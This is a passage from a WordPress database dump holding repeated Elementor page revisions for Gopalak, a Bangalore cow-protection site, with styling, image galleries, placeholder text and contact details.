src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:00:15','2022-10-11 12:30:15','',1373,'https://gopalak.in/?p=1644',0,'revision','',0),(1646,1,'2022-10-11 18:04:58','2022-10-11 12:34:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:04:58','2022-10-11 12:34:58','',1373,'https://gopalak.in/?p=1646',0,'revision','',0),(1647,1,'2022-10-11 18:04:58','2022-10-11 12:34:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:04:58','2022-10-11 12:34:58','',1373,'https://gopalak.in/?p=1647',0,'revision','',0),(1648,1,'2022-10-11 18:04:58','2022-10-11 12:34:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:04:58','2022-10-11 12:34:58','',1373,'https://gopalak.in/?p=1648',0,'revision','',0),(1650,1,'2022-10-11 18:13:45','2022-10-11 12:43:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		